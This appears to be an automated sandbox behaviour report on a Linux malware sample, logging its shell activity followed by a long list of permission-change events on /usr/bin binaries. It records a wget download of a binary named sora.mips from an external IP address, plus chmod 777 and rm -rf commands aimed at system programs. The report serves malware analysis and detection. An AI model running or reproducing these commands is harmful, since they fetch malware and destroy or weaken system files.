Executes the "chmod" command used to modify permissions

Source: /bin/sh (PID: 6217)

Chmod executable: /usr/bin/chmod -> chmod 777 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash bashbug batch bc bccmd bdftopcf

Jump to behavior

Executes the "curl" command used to transfer data via the network (typically using HTTP/S)

Source: /bin/sh (PID: 6214)

Curl executable: /usr/bin/curl -> curl cd /tmp

Jump to behavior

Executes the "rm" command used to delete files or directories

Source: /bin/sh (PID: 6233)

Rm executable: /usr/bin/rm -> rm -rf 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash bashbug batch bc bccmd bdftopcf

Jump to behavior

Executes the "wget" command typically used for HTTP/S downloading

Source: /bin/sh (PID: 6216)

Wget executable: /usr/bin/wget -> wget http://185.196.11.177/bins/sora.mips

Jump to behavior

Sample tries to set the executable flag

Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/2to3-2.7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/7z (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/7za (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/7zr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/GET (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/HEAD (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/NF (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/POST (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Thunar (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/VGAuthService (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/X (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/X11 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Xephyr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Xorg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Xwayland (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/[ (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aa-enabled (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aa-exec (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aconnect (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/acpi_listen (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/add-apt-repository (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/addpart (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/addr2line (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/al (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/al2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsabat (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsaloop (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsamixer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsatplg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsaucm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/amidi (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/amixer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apgbfm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aplay (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aplaymidi (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-bug (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-cli (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-collect (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-unpack (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/appres (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/appstreamcli (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aprofutil (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apropos (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-add-repository (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-cache (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-cdrom (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-config (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-extracttemplates (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-ftparchive (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-get (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-key (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-mark (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-sortpkgs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aptdcon (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apturl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apturl-gtk (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ar (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arch (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arecord (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arecordmidi (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arm2hpdl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/as (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aseqdump (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aseqnet (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/asp-state4 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aspell (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aspell-import (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/at (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atobm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atq (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atril (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atril-previewer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atril-thumbnailer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atrm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/automat-visualize3 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/avahi-browse (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/avahi-browse-domains (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/avahi-publish (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/avahi-publish-address (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/avahi-publish-service (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/avahi-resolve (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/avahi-resolve-address (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/avahi-resolve-host-name (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/avahi-set-host-name (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/awk (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/axfer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/b2sum (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/base32 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/base64 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/basename (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bash (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bashbug (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/batch (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bc (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bccmd (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bdftopcf (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bdftruncate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bitmap (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/blueman-adapters (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/blueman-applet (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/blueman-assistant (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/blueman-manager (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/blueman-report (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/blueman-sendto (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/blueman-services (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/blueman-tray (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bluemoon (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bluetooth-sendto (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bluetoothctl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bmtoa (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/boltctl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bootctl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/brltty (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/brltty-ctb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/brltty-trtxt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/brltty-ttb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/broadwayd (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/browse (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bsd-from (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bsd-write (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/btattach (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/btmgmt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/btmon (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/btrfs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/btrfs-convert (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/btrfs-find-root (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/btrfs-image (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/btrfs-map-logical (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/btrfs-select-super (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/btrfsck (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/btrfstune (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bundle2.7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bundler2.7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bunzip2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/busctl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/busybox (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bwrap (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-config (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-ctrl-a (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-disable (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-disable-prompt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-enable (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-enable-prompt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-export (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-janitor (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-keybindings (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-launch (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-launcher (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-launcher-install (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-launcher-uninstall (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-layout (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-prompt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-quiet (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-reconnect-sockets (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-screen (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-select-backend (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-select-profile (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-select-session (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-shell (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-silent (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-status (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-status-detail (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-tmux (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-ugraph (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/byobu-ulevel (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bzcat (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bzcmp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bzdiff (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bzegrep (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bzexe (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bzfgrep (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bzgrep (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bzip2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bzip2recover (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bzless (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/bzmore (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/c++filt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/c_rehash (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cal (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/calendar (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/calibrate_ppa (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cancel (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/captoinfo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/caspol (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cat (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/catchsegv (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/catfish (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/catman (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cautious-launcher (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cccheck (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ccrewrite (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cd-create-profile (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cd-fix-profile (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cd-iccdump (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cd-it8 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cert-sync (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cert2spc (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/certmgr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cftp3 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
